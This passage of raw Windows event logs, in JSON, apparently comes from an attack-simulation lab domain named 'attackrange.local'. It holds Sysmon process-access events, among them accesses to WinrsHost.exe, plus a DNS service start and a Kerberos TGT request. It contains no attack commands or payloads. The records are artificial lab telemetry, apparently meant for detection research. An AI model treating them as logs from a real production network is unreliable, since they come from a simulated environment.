C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.317","SourceProcessGUID":"{E2A3D6B1-1083-5F25-0000-00108E750400}","SourceProcessId":"4204","SourceThreadId":"4232","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-001091730400}","TargetProcessId":"4188","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2525,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+827d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+827d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2526,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2527,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2528,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2529,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-001091730400}\r\nTargetProcessId: 4188\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-001091730400}","TargetProcessId":"4188","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2530,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2531,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76834,"ProcessID":852,"ThreadID":940,"Channel":"System","Message":"The DNS service entered the running state.","param1":"DNS","param2":"running","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220274,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tSupplied Realm Name:\tATTACKRANGE.LOCAL\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-1008","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
